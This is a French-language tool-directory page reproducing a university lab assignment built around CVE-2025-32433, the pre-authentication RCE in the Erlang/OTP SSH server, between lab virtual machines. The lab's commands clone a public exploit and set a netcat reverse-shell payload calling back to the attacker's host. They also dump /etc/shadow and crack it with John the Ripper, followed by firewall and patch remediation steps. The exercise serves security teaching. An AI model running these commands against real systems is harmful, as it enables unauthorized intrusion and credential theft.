Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Exploiting-a-vulnerability-using-reverse-shell — Ce projet simule un scénario réaliste d'attaque et de défense sur deux machines virtuelles. Vous exploiterez une vulnérabilité critique de RCE pré-authentification (CVE-2025-32433) dans un serveur SSH Erlang/OTP, craquerez les hashs de mots de passe extraits, puis durcirez la machine victime avec des règles de pare-feu et des correctifs. | Kitploit
Outils/GitHubGitHub/dampedcoast/exploiting-a-vulnerability-using-reverse-shell
Cassage de Mots de PasseAnalyse des VulnérabilitésExploitationSécurité RéseauCTFTests d'IntrusionApprentissage et ÉducationLabs et Pratique

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Ce projet simule un scénario réaliste d'attaque et de défense sur deux machines virtuelles. Vous exploiterez une vulnérabilité critique de RCE pré-authentification (CVE-2025-32433) dans un serveur SSH Erlang/OTP, craquerez les hashs de mots de passe extraits, puis durcirez la machine victime avec des règles de pare-feu et des correctifs.

GitHub
dampedcoast/exploiting-a-vulnerability-using-reverse-shell

Exploiting-a-vulnerability-using-reverse-shell

Voir le dépôt
il y a 2 moisPas encore vérifié
Partager

Fondamentaux de la sécurité de l'information — Projet Printemps 2026

Points totaux : 20 | Date limite : Aucune soumission tardive acceptée

Aperçu

Ce projet simule un scénario réaliste d'attaque et de défense entre deux machines virtuelles. Vous exploiterez une vulnérabilité critique de RCE pré-authentification (CVE-2025-32433) dans un serveur SSH Erlang/OTP, casserez les hash de mots de passe extraits, puis durcirez la machine victime avec des règles de pare-feu et des correctifs.

RôleOS
AttaquantKali Linux
VictimeUbuntu/Debian (Erlang/OTP SSH v27.3.2)

Fichiers

FichierDescription
Debian-1.ovaImage VM victime préconstruite — à télécharger séparément, voir Ressources (trop volumineuse pour GitHub)

Ressources

  • VM victime (Debian-1.ova) : Lien de téléchargement — trop volumineuse (~3 Go) pour être hébergée sur GitHub. Téléchargez-la séparément et importez-la dans VirtualBox/VMware comme décrit ci-dessous.
  • Liste de mots (rockyou_txt.txt) : incluse dans ce dépôt, utilisée pour l'étape de cassage de mot de passe dans la Partie 2.

Configuration

  1. Importer les VM — Chargez Debian-1.ova et votre VM Kali Linux dans VirtualBox/VMware.
  2. Réseau — Configurez les deux VM sur Adaptateur hôte uniquement afin qu'elles puissent communiquer en privé.
  3. IP de la victime — Démarrez la victime et exécutez ifconfig pour trouver son IP (généralement dans 192.168.56.0/24).

Partie 1 — Déploiement et exploitation d'un serveur SSH vulnérable (10 pts)

Reconnaissance

root@kitploit:~
nmap -p 2222 -sV -A <victim-IP>

Documentez les ports ouverts, les versions des services et les signatures Erlang.

Exploit CVE-2025-32433 (RCE pré-authentification)

Basculez temporairement Kali en NAT pour cloner le dépôt, puis repassez en Host-Only.

root@kitploit:~
git clone https://github.com/ProDefense/CVE-2025-32433.git
cd CVE-2025-32433
sudo nano CVE-2025-32433.py

Modifiez le script — définissez HOST = "<victim-IP>" et mettez à jour le payload :

root@kitploit:~
command='os:cmd("nc -e /bin/bash <Kali-IP> 4444").'

Terminal 1 (Kali) — démarrez le listener :

root@kitploit:~
nc -lvnp 4444

Terminal 2 (Kali) — lancez l'exploit :

root@kitploit:~
python3 CVE-2025-32433.py

Dans le shell inversé, exécutez whoami et hostname pour confirmer l'accès.


Partie 2 — Post-exploitation et cassage de mots de passe (5 pts)

Extraire et casser le hash

root@kitploit:~
# On victim (via reverse shell)
cat /etc/shadow | grep testuser > hash.txt

# On Kali
john --wordlist=rockyou_txt.txt hash.txt

Documentez le format du hash (par ex. $6$ = SHA-512), le temps nécessaire et le mot de passe en clair récupéré.

Trouver le flag

root@kitploit:~
find / -iname "flag.txt" 2>/dev/null
cat /path/to/flag.txt

Partie 3 — Contrôles et remédiation (5 pts)

Bloquer le vecteur d'attaque (iptables)

root@kitploit:~
sudo iptables -A INPUT -p tcp --dport 2222 -j DROP

Relancez le scan Nmap et l'exploit depuis Kali — documentez que le port 2222 est désormais « Filtered » et que l'exploit échoue.

Corriger la vulnérabilité

Documentez les étapes pour mettre à niveau Erlang/OTP vers v27.3.3 ou ultérieure, qui contient le correctif pour CVE-2025-32433.


Livrables

  • Rapport complet avec captures d'écran de : scan, exécution de l'exploit, shell inversé (whoami/hostname), capture du flag
  • Documentation du pare-feu avant/après (résultats Nmap montrant le changement d'état du port)
  • Réflexion écrite expliquant pourquoi les RCE pré-authentification sont nettement plus dangereuses que les exploits post-authentification

Référence CVE

CVE-2025-32433 — Exécution de code à distance critique avant authentification dans le serveur SSH Erlang/OTP. Exploitable en envoyant des paquets SSH malformés avant tout échange d'identifiants, donnant à un attaquant non authentifié un accès shell complet.

Télécharger l’outil
Project Spring 2026 - Google Docs.pdfInstructions complètes du projet avec livrables
rockyou_txt.txtListe de mots utilisée avec John the Ripper pour casser le hash du mot de passe extrait